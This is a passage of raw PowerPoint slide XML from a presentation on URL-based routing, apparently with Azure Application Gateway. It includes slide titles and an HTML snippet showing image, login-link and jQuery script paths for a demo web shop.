        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106027" y="2209800"/>
            <a:ext cx="4116055" cy="3659982"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Inhaltsplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D2A253D-286F-BDB8-0A19-5939FF4EC94E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6266142" y="2305050"/>
            <a:ext cx="5840554" cy="3361788"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="798974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olour-coded on electronic circuit board">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{607AE5A4-88AF-C87C-A262-A3729F88842A}"/>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a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="12191979" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titel 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F233D38F-1C30-5C37-3AFB-E59F196FCBA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059318" y="2223018"/>
            <a:ext cx="5148535" cy="922854"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="151B19">
              <a:alpha val="60000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Routing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2484025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BA6FC73-E8BD-5F75-360B-E8FF9522D512}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044516" y="1076635"/>
            <a:ext cx="3930256" cy="3495365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>Url Based Routing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12">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6A653B98-837E-AD47-5D9E-776BFE079734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5524500" y="933011"/>
            <a:ext cx="6069273" cy="4991976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2002455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BF4C83-B6AB-31BA-5A65-529668FB0A5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="850392"/>
            <a:ext cx="9922764" cy="1534081"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Image without rewrite</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and without additional virtual path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Inhaltsplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83EAA148-DB8B-7641-0243-79A257292B87}"/>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586107" y="2447925"/>
            <a:ext cx="6926124" cy="3838575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Textfeld 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{909F0658-715C-4CD8-E501-0D1415BAC756}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="6479971"/>
            <a:ext cx="3913632" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://agw-demo-04.northeurope.cloudapp.azure.com/shop/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3285186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7C3C41D2-7479-E004-0853-DB6909CEFA6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="2942642"/>
            <a:ext cx="9922764" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/images/brand.png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>alt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eShop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> On Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" /&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="2400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/Identity/Account/Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>jquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/jquery.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5DB0D7"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADAD6980-41C9-7BB1-ED46-F8874B06B52D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="1090245"/>
            <a:ext cx="9922764" cy="708023"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" cap="none" dirty="0"/>
              <a:t>The HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Geschweifte Klammer rechts 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F89324FB-ABDF-1A7D-E1BB-4827C9FED9A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3492092" y="3305773"/>
            <a:ext cx="237690" cy="66273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8" name="Geschweifte Klammer rechts 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CA33C95-0FD4-6857-196C-F0F089FB50A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3300543" y="4024694"/>
            <a:ext cx="237690" cy="66273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9" name="Geschweifte Klammer rechts 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02258CF6-057E-F80C-EEBE-E8463F15BB06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4038774" y="4726281"/>
            <a:ext cx="237690" cy="66273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0" name="Textfeld 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
